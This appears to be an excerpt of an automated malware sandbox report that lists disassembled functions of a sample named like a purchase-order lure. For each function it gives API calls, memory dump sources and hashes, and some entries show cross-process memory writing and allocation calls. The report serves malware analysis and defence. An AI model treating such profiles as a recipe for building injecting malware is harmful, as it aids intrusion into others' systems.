                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                                                      • Opcode ID: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
                                                                                                                                                                                                      • Instruction ID: 305292cf3701eb74ee210533d413ef74276f9a5688495286bd354ebed6b62e2e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 186640bc092136c8836b36fd74f5553999f6ef9858cf0f45e654f2fc4a48aff1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8F01930201204EFCB61AF65EC4CB993F65EB02366F088329E465841F2C7348996DF5C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0044F2DA
                                                                                                                                                                                                      • CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044F2F2
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0044F555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                      • API String ID: 948891078-24824748
                                                                                                                                                                                                      • Opcode ID: 91ade7effae80d1e2d402c9abdcdf63e1fab9ea58c5caa222256b2330b8234fe
                                                                                                                                                                                                      • Instruction ID: 4d7391de075464714a8c3291d240941207e243e8aeb7da400a877c7a430c7a2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91ade7effae80d1e2d402c9abdcdf63e1fab9ea58c5caa222256b2330b8234fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACA14DB1504201AFD300EF65C881EAFB7ECEF98318F00492EF55597192EB74EA49CB96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0044E85D
                                                                                                                                                                                                      • CoCreateInstance.OLE32(0048DA7C,00000000,00000001,0048D8EC,?), ref: 0044E876
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0044E893
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                                                                                                      • Opcode ID: fbc0b71fd5f665683a4e855e2ddef57b2edea624eeed6b908bef03ecdca15a51
                                                                                                                                                                                                      • Instruction ID: 10c43b87b23ce4038536d43f928ead2d0a8ecdf508b023c31232c5178fa219cf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbc0b71fd5f665683a4e855e2ddef57b2edea624eeed6b908bef03ecdca15a51
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EA166756043019FDB10EF25C48491EBBE5BF88314F14895EF996AB3A2CB35EC45CB85
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 004232ED
                                                                                                                                                                                                        • Part of subcall function 0042E0D0: __87except.LIBCMT ref: 0042E10B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                                                      • Opcode ID: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
                                                                                                                                                                                                      • Instruction ID: 1a21917130ddbb47f9248a99b6df19eade1bd1d8620e4c39e32b257b59b9eced
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fda4fbb42dc3b36c5c190533d3c43eac553db1d2182f2045c8b461978330a63
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43515961B08221D2CB15BF15F90137B2BA49B40711FE04DBBE8C6823E9DF7C8E95965E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0049DC50,?,0000000F,0000000C,00000016,0049DC50,?), ref: 00444645
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 004446C5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                                                                                                      • API String ID: 3797816924-776492005
                                                                                                                                                                                                      • Opcode ID: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
                                                                                                                                                                                                      • Instruction ID: 598861723889322f2b36ecddc1b796b6f6d96aabc3fe50002778cc507f541961
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbefdce5a163b64322f3fc20a3cb374916d2128bf38069e792ad8926594cfb1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE419874A001199FDF00DF65C881AAEB7B5FF89308F14806EE915AB392DB38DD46CB58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0044430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC08,?,?,00000034,00000800,?,00000034), ref: 00444335
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0043C1D3
                                                                                                                                                                                                        • Part of subcall function 004442D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0043BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00444300
                                                                                                                                                                                                        • Part of subcall function 0044422F: GetWindowThreadProcessId.USER32(?,?), ref: 0044425A
                                                                                                                                                                                                        • Part of subcall function 0044422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0044426A
                                                                                                                                                                                                        • Part of subcall function 0044422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0043BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00444280
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C240
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043C28D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                      • Opcode ID: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
                                                                                                                                                                                                      • Instruction ID: 3f4c4a65faee7a5d8857929f5e28f96f4fee7115f0a52c3415428020ef33ee1d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae477d9df93bac96d9bb21d4aeb4c3ee73f37a213a0a1487a1f49a80afdf1839
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C413976A0021CAFDB10DFA4CD81BEEB7B8BF49704F00409AFA45B7181DA756E45CB65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0049DC00,00000000,?,?,?,?), ref: 0046A6D8
                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 0046A6F5
                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0046A705
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                      • Opcode ID: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
                                                                                                                                                                                                      • Instruction ID: e35dea41237fcbc3d60db0d7b0801f268ac0ee7baed950b9ceceedc0e64d78fd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2a74fddaa6c3cd3c03317601c7c16233c3959efa95fba5e0452c389bbffce1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31B231601605ABDB118E34CC41BEB77A9EF49324F24472AF875A32E1D738E8609B5A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00455190
                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004551C6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                                                      • String ID: |$DE
                                                                                                                                                                                                      • API String ID: 1413715105-2586410654
                                                                                                                                                                                                      • Opcode ID: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
                                                                                                                                                                                                      • Instruction ID: 7ff0a5d39f7edaf8f80adf74e6cb1badfa182ff46140bd3db269d441b7208e6c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb3efb7376b2ee8b3b9d292cd61c4e768093f9ed3e25bdc4c130753edd66b9fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66311871C00119ABCF01AFE5CD85AEE7FB9FF18704F00016AF815B6166DA35A916DBA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0046A15E
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0046A172
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0046A196
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                      • Opcode ID: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
                                                                                                                                                                                                      • Instruction ID: 2be483add4762aa6c11c59ba3fc8898740279692600701ed87bb33f31a59144f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 416cc77b0198d72f98cea775319e80d4bf96db53c998f8ae22c1170698be4b66
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8021BF32510218ABEF118F94CC42FEA3B79EF49714F100215FA557B1D0E6B9AC51CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0046A941
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0046A94F
                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0046A956
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                      • Opcode ID: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
                                                                                                                                                                                                      • Instruction ID: 5f55c68ffc2c420652bad11bb8842fcf2bc24ed935bcb913f205816fc4057d67
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1067a081f2408370cafea43e1f8b9025aec776f1afa58adc9aec223e14090407
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E21B5B5600609AFDB00DF18CC81D7737ADEF5A358B15045AFA04A7361DB34EC118B66
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0046A46D
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0046A482
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0046A48F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                      • Opcode ID: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
                                                                                                                                                                                                      • Instruction ID: 66ff69cd09a3b487b2c32ef9eb509d7a9d7ee40f74df3f0d23145d62b3b9f1d8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41754b513def9cf98bdc0798ae0aa73d5b25d3dfe951ac7db443d47a0928b724
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C711E771200208BEEF209F65CC49FEB3769EF89754F014129FA45A6191E6B6E821CB29
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00422350,?), ref: 004222A1
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004222A8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                      • API String ID: 2574300362-340411864
                                                                                                                                                                                                      • Opcode ID: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
                                                                                                                                                                                                      • Instruction ID: 6f86a244cca01810aa437f803786dff7c52cda76eae9428ae4ec3552b341fd87
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a70b438149ed86b1d97bf85651eb594e6c3ab5329165ed77ca41c5e8dadc331
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEE01270A91300EBDBA06F70ED8EF193B64AB00B06F604875B182E61E0CFBA8040CF1C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00422276), ref: 00422376
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0042237D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
